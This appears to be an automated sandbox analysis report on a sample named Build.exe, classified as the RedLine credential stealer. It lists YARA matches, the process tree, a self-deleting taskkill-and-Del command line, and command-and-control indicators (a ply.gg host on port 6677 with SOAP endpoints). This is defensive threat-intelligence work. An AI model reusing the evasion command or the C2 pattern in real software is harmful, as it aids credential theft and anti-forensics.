Edit tour

Windows Analysis Report
Build.exe

Overview

General Information

Sample name:	Build.exe
Analysis ID:	1464753
MD5:	19e47b9abf123f4502545a5fcb43c855
SHA1:	c722baba8294f20abdb344b61d72d444a4171b62
SHA256:	d3215483bba6219bb6587367aa3fa8c1737706497ed4befcb175649dc00e7be2
Tags:	exe
Infos:

Detection

RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected RedLine Stealer

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

AI detected suspicious sample

Machine Learning detection for sample

Self deletion via cmd or bat file

Uses known network protocols on non-standard ports

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

HTTP GET or POST without a user agent

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Yara signature match

Classification

Process Tree

System is w10x64

Build.exe (PID: 6356 cmdline: "C:\Users\user\Desktop\Build.exe" MD5: 19E47B9ABF123F4502545A5FCB43C855)

cmd.exe (PID: 4444 cmdline: "cmd.exe" /C taskkill /F /PID 6356 && choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\Build.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 4476 cmdline: taskkill /F /PID 6356 MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

choice.exe (PID: 3096 cmdline: choice /C Y /N /D Y /T 3 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
Build.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
Build.exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Build.exe	Windows_Trojan_RedLineStealer_17ee6a17	unknown	unknown	0x19e50:$a1: RedLine.Logic.SQLite 0x1f396:$b1: SELECT * FROM Win32_Process Where SessionId='{0}' 0x19884:$b2: get_encryptedUsername 0x1edd1:$b3: https://icanhazip.com 0x173e8:$b4: GetPrivate3Key 0x174c0:$b4: GetPrivate3Key 0x17633:$b4: GetPrivate3Key 0x1d1b1:$b4: GetPrivate3Key
Build.exe	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1a2a1:$x2: RedLine.Client. 0x1b30b:$x2: RedLine.Client. 0x1c0f7:$x2: RedLine.Client. 0x1c388:$x2: RedLine.Client. 0x17324:$u2: <ParseBrowsers> 0x1734f:$u2: <ParseBrowsers> 0x17459:$u2: <ParseBrowsers> 0x1748b:$u2: <ParseBrowsers> 0x1a5f8:$u4: UserLog 0x20a96:$u4: UserLog 0x20679:$u6: InstalledBrowserInfoT 0x17b7f:$u7: RunPE 0x17b94:$u7: RunPE 0x1d07c:$u8: DownloadAndEx 0x17bf6:$u11: .Models.WMI 0x1f350:$pat1: (((([0-9.])\d)+){1}) 0x1f42a:$pat14: , CommandLine: 0x1be9b:$v2_1: ListOfProcesses 0x177f0:$v4_2: isWow64 0x19678:$v4_8: procName

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000000.1640140886.0000000000322000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000000.1640140886.0000000000322000.00000002.00000001.01000000.00000003.sdmp	Windows_Trojan_RedLineStealer_17ee6a17	unknown	unknown	0x19c50:$a1: RedLine.Logic.SQLite 0x1f196:$b1: SELECT * FROM Win32_Process Where SessionId='{0}' 0x19684:$b2: get_encryptedUsername 0x1ebd1:$b3: https://icanhazip.com 0x171e8:$b4: GetPrivate3Key 0x172c0:$b4: GetPrivate3Key 0x17433:$b4: GetPrivate3Key 0x1cfb1:$b4: GetPrivate3Key
00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: Build.exe PID: 6356	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: Build.exe PID: 6356	Windows_Trojan_RedLineStealer_17ee6a17	unknown	unknown	0x25361:$a1: RedLine.Logic.SQLite 0x24d9d:$b2: get_encryptedUsername 0x2296a:$b4: GetPrivate3Key 0x22a3c:$b4: GetPrivate3Key 0x22ba6:$b4: GetPrivate3Key 0x285ce:$b4: GetPrivate3Key 0x28bed:$b4: GetPrivate3Key 0x28cb5:$b4: GetPrivate3Key 0x28e09:$b4: GetPrivate3Key

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.Build.exe.320000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.0.Build.exe.320000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.0.Build.exe.320000.0.unpack	Windows_Trojan_RedLineStealer_17ee6a17	unknown	unknown	0x19e50:$a1: RedLine.Logic.SQLite 0x1f396:$b1: SELECT * FROM Win32_Process Where SessionId='{0}' 0x19884:$b2: get_encryptedUsername 0x1edd1:$b3: https://icanhazip.com 0x173e8:$b4: GetPrivate3Key 0x174c0:$b4: GetPrivate3Key 0x17633:$b4: GetPrivate3Key 0x1d1b1:$b4: GetPrivate3Key
0.0.Build.exe.320000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1a2a1:$x2: RedLine.Client. 0x1b30b:$x2: RedLine.Client. 0x1c0f7:$x2: RedLine.Client. 0x1c388:$x2: RedLine.Client. 0x17324:$u2: <ParseBrowsers> 0x1734f:$u2: <ParseBrowsers> 0x17459:$u2: <ParseBrowsers> 0x1748b:$u2: <ParseBrowsers> 0x1a5f8:$u4: UserLog 0x20a96:$u4: UserLog 0x20679:$u6: InstalledBrowserInfoT 0x17b7f:$u7: RunPE 0x17b94:$u7: RunPE 0x1d07c:$u8: DownloadAndEx 0x17bf6:$u11: .Models.WMI 0x1f350:$pat1: (((([0-9.])\d)+){1}) 0x1f42a:$pat14: , CommandLine: 0x1be9b:$v2_1: ListOfProcesses 0x177f0:$v4_2: isWow64 0x19678:$v4_8: procName

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Build.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: Build.exe	ReversingLabs: Detection: 78%
Source: Build.exe	Virustotal: Detection: 74%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: Build.exe

Joe Sandbox ML: detected

Source: Build.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Build.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.ServiceModel.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.ServiceModel.Internals.pdbbQT;r source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb\|M~q source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ServiceModel.Internals.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ".ServiceModel.Internals.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdbX source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: Build.exe, 00000000.00000002.1863379517.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdby source: Build.exe, 00000000.00000002.1863379517.0000000000ABF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: erviceModel.Internals.pdb source: Build.exe, 00000000.00000002.1866156189.000000000646B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb\M source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000ABF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 0__31bf3856ad364e35\System.ServiceModel.Internals.pdb) source: Build.exe, 00000000.00000002.1866156189.000000000646B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.ServiceModel.Internals.pdb8 source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ServiceModel.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.ServiceModel.Internals.pdbpdbals.pdbqq source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: symbols\dll\System.ServiceModel.Internals.pdb source: Build.exe, 00000000.00000002.1866138722.000000000645A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp

Networking

Uses known network protocols on non-standard ports

Source: unknown

Network traffic detected: HTTP traffic on port 49731 -> 6677

Yara detected Generic Downloader

Source: Yara match	File source: Build.exe, type: SAMPLE
Source: Yara match	File source: 0.0.Build.exe.320000.0.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.4:49731 -> 147.185.221.16:6677

Source: global traffic

HTTP traffic detected: POST /IRemotePanel HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/IRemotePanel/GetSettings"Host: medical-m.gl.at.ply.gg:6677Content-Length: 136Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 147.185.221.16 147.185.221.16

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: medical-m.gl.at.ply.gg
Source: global traffic	DNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa

Source: unknown

Source: Build.exe	String found in binary or memory: http://checkip.amazonaws.com/)https://ipinfo.io/ip
Source: Build.exe, 00000000.00000002.1864630370.00000000027EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://medical-m.gl.at.ply.gg
Source: Build.exe, 00000000.00000002.1864630370.00000000027D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://medical-m.gl.at.ply.gg:6677
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://medical-m.gl.at.ply.gg:6677/IRemotePanel
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: Build.exe, 00000000.00000002.1864630370.00000000027EF000.00000004.00000800.00020000.00000000.sdmp, Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp, Build.exe, 00000000.00000002.1864630370.00000000027E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: Build.exe, 00000000.00000002.1864630370.00000000027D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Build.exe, 00000000.00000002.1864630370.00000000027EF000.00000004.00000800.00020000.00000000.sdmp, Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp, Build.exe, 00000000.00000002.1864630370.00000000027E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: Build.exe, 00000000.00000002.1864630370.00000000027E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/0
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/IRemotePanel/
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/IRemotePanel/CompleteTaskLR
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/IRemotePanel/CompleteTaskResponse05
Source: Build.exe, 00000000.00000002.1864630370.00000000027E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/IRemotePanel/GetSettings
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/IRemotePanel/GetSettingsLR
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/IRemotePanel/GetSettingsResponse05
Source: Build.exe, 00000000.00000002.1864630370.00000000027E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/IRemotePanel/GetSettingsT
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/IRemotePanel/GetTasksLR
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/IRemotePanel/GetTasksResponse05
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/IRemotePanel/SendClientInfoLR
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/IRemotePanel/SendClientInfoResponse05
Source: Build.exe	String found in binary or memory: https://api.ipify.org
Source: Build.exe	String found in binary or memory: https://google.com/
Source: Build.exe	String found in binary or memory: https://icanhazip.com5https://wtfismyip.com/textChttp://bot.whatismyipaddress.com/3http://checkip.dy

System Summary

Malicious sample detected (through community Yara rule)

Source: Build.exe, type: SAMPLE	Matched rule: Windows_Trojan_RedLineStealer_17ee6a17 Author: unknown
Source: Build.exe, type: SAMPLE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.0.Build.exe.320000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_17ee6a17 Author: unknown
Source: 0.0.Build.exe.320000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000000.00000000.1640140886.0000000000322000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_17ee6a17 Author: unknown
Source: Process Memory Space: Build.exe PID: 6356, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_17ee6a17 Author: unknown

Source: C:\Users\user\Desktop\Build.exe	Code function: 0_2_00CCDFE8	0_2_00CCDFE8
Source: C:\Users\user\Desktop\Build.exe	Code function: 0_2_00CCD2B0	0_2_00CCD2B0
Source: C:\Users\user\Desktop\Build.exe	Code function: 0_2_04C689C0	0_2_04C689C0
Source: C:\Users\user\Desktop\Build.exe	Code function: 0_2_04C64B50	0_2_04C64B50
Source: C:\Users\user\Desktop\Build.exe	Code function: 0_2_04C65611	0_2_04C65611
Source: C:\Users\user\Desktop\Build.exe	Code function: 0_2_04C67028	0_2_04C67028
Source: C:\Users\user\Desktop\Build.exe	Code function: 0_2_04C66FF6	0_2_04C66FF6

Source: Build.exe, 00000000.00000002.1863379517.0000000000A3E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Build.exe
Source: Build.exe, 00000000.00000000.1640202823.0000000000346000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameRedLine.Client.exe0 vs Build.exe
Source: Build.exe	Binary or memory string: OriginalFilenameRedLine.Client.exe0 vs Build.exe

Source: Build.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Build.exe, type: SAMPLE	Matched rule: Windows_Trojan_RedLineStealer_17ee6a17 reference_sample = 497bc53c1c75003fe4ae3199b0ff656c085f21dffa71d00d7a3a33abce1a3382, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = a1f75937e83f72f61e027a1045374d3bd17cd387b223a6909b9aed52d2bc2580, id = 17ee6a17-161e-454a-baf1-2734995c82cd, last_modified = 2021-08-23
Source: Build.exe, type: SAMPLE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.0.Build.exe.320000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_17ee6a17 reference_sample = 497bc53c1c75003fe4ae3199b0ff656c085f21dffa71d00d7a3a33abce1a3382, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = a1f75937e83f72f61e027a1045374d3bd17cd387b223a6909b9aed52d2bc2580, id = 17ee6a17-161e-454a-baf1-2734995c82cd, last_modified = 2021-08-23
Source: 0.0.Build.exe.320000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000000.00000000.1640140886.0000000000322000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_17ee6a17 reference_sample = 497bc53c1c75003fe4ae3199b0ff656c085f21dffa71d00d7a3a33abce1a3382, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = a1f75937e83f72f61e027a1045374d3bd17cd387b223a6909b9aed52d2bc2580, id = 17ee6a17-161e-454a-baf1-2734995c82cd, last_modified = 2021-08-23
Source: Process Memory Space: Build.exe PID: 6356, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_17ee6a17 reference_sample = 497bc53c1c75003fe4ae3199b0ff656c085f21dffa71d00d7a3a33abce1a3382, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = a1f75937e83f72f61e027a1045374d3bd17cd387b223a6909b9aed52d2bc2580, id = 17ee6a17-161e-454a-baf1-2734995c82cd, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.evad.winEXE@8/0@2/1

Source: C:\Users\user\Desktop\Build.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3980:120:WilError_03

Source: Build.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Build.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Windows\SysWOW64\taskkill.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 6356)

Source: C:\Users\user\Desktop\Build.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Build.exe	ReversingLabs: Detection: 78%
Source: Build.exe	Virustotal: Detection: 74%

Source: unknown	Process created: C:\Users\user\Desktop\Build.exe "C:\Users\user\Desktop\Build.exe"
Source: C:\Users\user\Desktop\Build.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C taskkill /F /PID 6356 && choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\Build.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /PID 6356
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Users\user\Desktop\Build.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C taskkill /F /PID 6356 && choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\Build.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /PID 6356	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3	Jump to behavior

Source: C:\Users\user\Desktop\Build.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll	Jump to behavior

Source: Build.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Build.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.ServiceModel.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.ServiceModel.Internals.pdbbQT;r source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb\|M~q source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ServiceModel.Internals.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ".ServiceModel.Internals.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdbX source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: Build.exe, 00000000.00000002.1863379517.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp
